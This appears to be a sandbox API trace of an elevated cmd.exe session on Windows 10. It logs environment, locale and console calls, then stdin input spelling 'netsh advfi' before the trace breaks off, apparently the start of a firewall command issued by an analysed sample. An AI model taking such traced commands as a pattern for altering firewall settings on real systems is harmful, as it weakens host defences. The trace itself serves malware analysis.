[0044.008] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0044.008] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0044.008] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0044.008] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0044.008] GetProcessHeap () returned 0x231f2440000 [0044.008] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f24464a0) returned 1 [0044.008] GetEnvironmentStringsW () returned 0x231f2445a10* [0044.008] GetProcessHeap () returned 0x231f2440000 [0044.008] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xa94) returned 0x231f2447a10 [0044.008] FreeEnvironmentStringsA (penv="A") returned 1 [0044.008] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0044.008] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.008] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0044.008] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0044.008] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0044.008] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0044.008] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0044.008] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0044.008] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0044.008] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0044.008] malloc (_Size=0xffce) returned 0x231f2640040 [0044.009] ??_V@YAXPEAX@Z () returned 0x231f2640040 [0044.009] GetProcessHeap () returned 0x231f2440000 [0044.009] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x40) returned 0x231f24484b0 [0044.009] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x231f2640040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.009] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x231f2640040, lpFilePart=0xdd04cff680 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xdd04cff680*="Desktop") returned 0x17 [0044.009] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0044.010] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xdd04cff3b0 | out: lpFindFileData=0xdd04cff3b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x231f2448500 [0044.010] FindClose (in: hFindFile=0x231f2448500 | out: hFindFile=0x231f2448500) returned 1 [0044.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xdd04cff3b0 | out: lpFindFileData=0xdd04cff3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x231f2448500 [0044.010] FindClose (in: hFindFile=0x231f2448500 | out: hFindFile=0x231f2448500) returned 1 [0044.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xdd04cff3b0 | out: lpFindFileData=0xdd04cff3b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x699af32d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x699af32d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x231f2448500 [0044.010] FindClose (in: hFindFile=0x231f2448500 | out: hFindFile=0x231f2448500) returned 1 [0044.010] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0044.010] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0044.010] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0044.010] GetProcessHeap () returned 0x231f2440000 [0044.010] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2447a10) returned 1 [0044.010] GetEnvironmentStringsW () returned 0x231f2440fc0* [0044.010] GetProcessHeap () returned 0x231f2440000 [0044.010] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0xacc) returned 0x231f2448500 [0044.011] FreeEnvironmentStringsA (penv="=") returned 1 [0044.011] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x231f2620080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.011] GetProcessHeap () returned 0x231f2440000 [0044.011] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f24484b0) returned 1 [0044.011] ??_V@YAXPEAX@Z () returned 0x1 [0044.011] ??_V@YAXPEAX@Z () returned 0x1 [0044.011] GetProcessHeap () returned 0x231f2440000 [0044.011] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x4016) returned 0x231f2448fe0 [0044.011] GetProcessHeap () returned 0x231f2440000 [0044.011] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2448fe0) returned 1 [0044.011] GetConsoleOutputCP () returned 0x1b5 [0044.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0044.236] GetUserDefaultLCID () returned 0x409 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6d1acbb78, cchData=8 | out: lpLCData=":") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xdd04cffa40, cchData=128 | out: lpLCData="0") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xdd04cffa40, cchData=128 | out: lpLCData="0") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xdd04cffa40, cchData=128 | out: lpLCData="1") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6d1acbb68, cchData=8 | out: lpLCData="/") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6d1acbb00, cchData=32 | out: lpLCData="Mon") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6d1acbac0, cchData=32 | out: lpLCData="Tue") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6d1acba80, cchData=32 | out: lpLCData="Wed") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6d1acba40, cchData=32 | out: lpLCData="Thu") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6d1acba00, cchData=32 | out: lpLCData="Fri") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6d1acb9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6d1acb980, cchData=32 | out: lpLCData="Sun") returned 4 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6d1acbb58, cchData=8 | out: lpLCData=".") returned 2 [0044.237] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6d1acbb40, cchData=8 | out: lpLCData=",") returned 2 [0044.237] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0044.239] GetProcessHeap () returned 0x231f2440000 [0044.239] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x0, Size=0x20c) returned 0x231f2446560 [0044.239] GetConsoleTitleW (in: lpConsoleTitle=0x231f2446560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0044.587] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.587] GetFileType (hFile=0x2b0) returned 0x3 [0044.588] ApiSetQueryApiSetPresence () returned 0x0 [0044.588] ResolveDelayLoadedAPI () returned 0x7ff9127ed990 [0044.827] BrandingFormatString () returned 0x231f2441850 [0044.832] GetVersion () returned 0x3ad7000a [0044.833] _vsnwprintf (in: _Buffer=0xdd04cffba0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0xdd04cffb38 | out: _Buffer="10.0.15063") returned 10 [0044.833] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.833] GetFileType (hFile=0x2b0) returned 0x3 [0044.833] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6d1ad7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0044.833] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6d1ad7f60, nSize=0x2000, Arguments=0xdd04cffb40 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0044.833] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.833] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0044.833] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xdd04cffa98, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cffa98*=0x26, lpOverlapped=0x0) returned 1 [0044.833] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xdd04cffb68 | out: _Buffer="\r\n") returned 2 [0044.833] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.833] GetFileType (hFile=0x2b0) returned 0x3 [0044.833] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.833] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0044.833] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdd04cffb38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cffb38*=0x2, lpOverlapped=0x0) returned 1 [0044.834] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0xdd04cffb68 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0044.834] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.834] GetFileType (hFile=0x2b0) returned 0x3 [0044.834] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.834] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0044.834] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdd04cffb38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cffb38*=0x34, lpOverlapped=0x0) returned 1 [0044.834] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xdd04cffb68 | out: _Buffer="\r\n") returned 2 [0044.834] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.834] GetFileType (hFile=0x2b0) returned 0x3 [0044.834] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0044.834] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0044.834] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdd04cffb38, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cffb38*=0x2, lpOverlapped=0x0) returned 1 [0044.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0044.834] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="CopyFileExW") returned 0x7ff92fdee830 [0044.834] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="IsDebuggerPresent") returned 0x7ff92fdee300 [0044.834] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff92f1b0a40 [0044.834] ??_V@YAXPEAX@Z () returned 0x1 [0044.835] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0044.835] GetFileType (hFile=0x2a4) returned 0x3 [0044.835] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0044.835] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0xdd04cff9a8 | out: TokenHandle=0xdd04cff9a8*=0x0) returned 0xc000007c [0044.835] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xdd04cff9a8 | out: TokenHandle=0xdd04cff9a8*=0x94) returned 0x0 [0044.835] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0xdd04cff958, TokenInformationLength=0x4, ReturnLength=0xdd04cff960 | out: TokenInformation=0xdd04cff958, ReturnLength=0xdd04cff960) returned 0x0 [0044.835] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0xdd04cff960, TokenInformationLength=0x4, ReturnLength=0xdd04cff958 | out: TokenInformation=0xdd04cff960, ReturnLength=0xdd04cff958) returned 0x0 [0044.835] NtClose (Handle=0x94) returned 0x0 [0044.835] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0xdd04cff970, nSize=0x0, Arguments=0xdd04cff978 | out: lpBuffer="\x8320\xf244\x231") returned 0xf [0044.835] GetProcessHeap () returned 0x231f2440000 [0044.835] RtlAllocateHeap (HeapHandle=0x231f2440000, Flags=0x8, Size=0x218) returned 0x231f2446c30 [0044.835] GetConsoleTitleW (in: lpConsoleTitle=0xdd04cff9c0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0044.952] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0044.952] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0045.444] GetProcessHeap () returned 0x231f2440000 [0045.444] RtlFreeHeap (HeapHandle=0x231f2440000, Flags=0x0, BaseAddress=0x231f2446c30) returned 1 [0045.444] LocalFree (hMem=0x231f2448320) returned 0x0 [0045.444] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xdd04cff7e8 | out: _Buffer="\r\n") returned 2 [0045.444] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.444] GetFileType (hFile=0x2b0) returned 0x3 [0045.444] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0045.444] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdd04cff7b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cff7b8*=0x2, lpOverlapped=0x0) returned 1 [0045.444] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0045.444] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x231f2620080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0045.444] malloc (_Size=0x107ce) returned 0x231f2630060 [0045.445] _vsnwprintf (in: _Buffer=0x231f2630060, _BufferCount=0x83e5, _Format="%s", _ArgList=0xdd04cff7f8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0045.445] _vsnwprintf (in: _Buffer=0x231f263008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xdd04cff7f8 | out: _Buffer=">") returned 1 [0045.445] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.445] GetFileType (hFile=0x2b0) returned 0x3 [0045.445] _get_osfhandle (_FileHandle=1) returned 0x2b0 [0045.445] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0045.445] WriteFile (in: hFile=0x2b0, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0xdd04cff7e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xdd04cff7e8*=0x18, lpOverlapped=0x0) returned 1 [0045.445] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.445] GetFileType (hFile=0x2a4) returned 0x3 [0045.445] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.445] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.445] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c30, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c32, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c34, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c36, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c38, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.446] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.446] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3e, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c40, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c42, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xdd04cffb48, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xdd04cffb48*=0x1, lpOverlapped=0x0) returned 1 [0045.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c44, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0045.447] _get_osfhandle (_FileHandle=0) returned 0x2a4 [0045.447] SetFilePointer (in: hFile=0x2a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.447] ReadFile (in: hFile=0x2a4, 